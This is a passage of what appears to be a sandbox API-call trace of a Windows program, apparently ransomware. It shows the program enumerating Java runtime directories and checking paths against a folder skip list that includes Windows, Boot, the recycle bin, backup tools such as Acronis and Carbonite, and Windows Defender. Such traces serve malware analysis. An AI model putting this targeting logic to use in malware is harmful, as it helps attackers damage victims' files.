(in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.982] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.983] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.983] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.983] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.983] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.983] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0090.991] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0090.991] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.991] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.998] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0090.999] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.012] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.012] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.013] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 0 [0091.013] FindClose (in: hFindFile=0x2b6f48 | out: hFindFile=0x2b6f48) returned 1 [0091.013] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 1 [0091.014] FindNextFileW (in: hFindFile=0x2b6f08, lpFindFileData=0x19f070 | out: lpFindFileData=0x19f070) returned 1 [0091.014] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\*.*", lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 0x2b6f48 [0091.030] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.033] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.034] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.034] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.034] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.034] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.034] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.034] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.034] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.034] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\applet\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.037] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.037] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.037] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.038] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.038] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.038] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.038] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.038] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.038] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.038] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7008 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.058] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.059] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.059] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.059] FindNextFileW (in: hFindFile=0x2b7008, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.059] FindClose (in: hFindFile=0x2b7008 | out: hFindFile=0x2b7008) returned 1 [0091.059] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.059] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.059] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\*.*", lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0x2b7048 [0091.070] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.071] CharUpperBuffW (in: lpsz="jfxrt.jar", cchLength=0x9 | out: lpsz="JFXRT.JAR") returned 0x9 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.071] CharUpperBuffW (in: lpsz="localedata.jar", cchLength=0xe | out: lpsz="LOCALEDATA.JAR") returned 0xe [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz="meta-index", cchLength=0xa | out: lpsz="META-INDEX") returned 0xa [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.071] CharUpperBuffW (in: lpsz="nashorn.jar", cchLength=0xb | out: lpsz="NASHORN.JAR") returned 0xb [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.071] CharUpperBuffW (in: lpsz="sunec.jar", cchLength=0x9 | out: lpsz="SUNEC.JAR") returned 0x9 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.071] CharUpperBuffW (in: lpsz="sunjce_provider.jar", cchLength=0x13 | out: lpsz="SUNJCE_PROVIDER.JAR") returned 0x13 [0091.071] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.071] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.072] CharUpperBuffW (in: lpsz="sunmscapi.jar", cchLength=0xd | out: lpsz="SUNMSCAPI.JAR") returned 0xd [0091.072] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.072] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.072] CharUpperBuffW (in: lpsz="sunpkcs11.jar", cchLength=0xd | out: lpsz="SUNPKCS11.JAR") returned 0xd [0091.072] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 1 [0091.072] CharUpperBuffW (in: lpsz=".jar", cchLength=0x4 | out: lpsz=".JAR") returned 0x4 [0091.072] CharUpperBuffW (in: lpsz="zipfs.jar", cchLength=0x9 | out: lpsz="ZIPFS.JAR") returned 0x9 [0091.072] FindNextFileW (in: hFindFile=0x2b7048, lpFindFileData=0x19ea90 | out: lpFindFileData=0x19ea90) returned 0 [0091.072] FindClose (in: hFindFile=0x2b7048 | out: hFindFile=0x2b7048) returned 1 [0091.073] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.073] CharUpperBuffW (in: lpsz=".properties", cchLength=0xb | out: lpsz=".PROPERTIES") returned 0xb [0091.073] CharUpperBuffW (in: lpsz="flavormap.properties", cchLength=0x14 | out: lpsz="FLAVORMAP.PROPERTIES") returned 0x14 [0091.073] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.073] CharUpperBuffW (in: lpsz=".bfc", cchLength=0x4 | out: lpsz=".BFC") returned 0x4 [0091.073] CharUpperBuffW (in: lpsz="fontconfig.bfc", cchLength=0xe | out: lpsz="FONTCONFIG.BFC") returned 0xe [0091.073] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.073] CharUpperBuffW (in: lpsz=".src", cchLength=0x4 | out: lpsz=".SRC") returned 0x4 [0091.073] CharUpperBuffW (in: lpsz="fontconfig.properties.src", cchLength=0x19 | out: lpsz="FONTCONFIG.PROPERTIES.SRC") returned 0x19 [0091.073] FindNextFileW (in: hFindFile=0x2b6f48, lpFindFileData=0x19ed80 | out: lpFindFileData=0x19ed80) returned 1 [0091.073] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.073] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0091.073] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0091.074] CharUpperBuffW (in: lpsz="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\", cchLength=0x2d | out: lpsz="C:\\PROGRAM FILES\\JAVA\\JRE1.8.0_131\\LIB\\FONTS\\") returned 0x2d [0091.074] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0091.074] 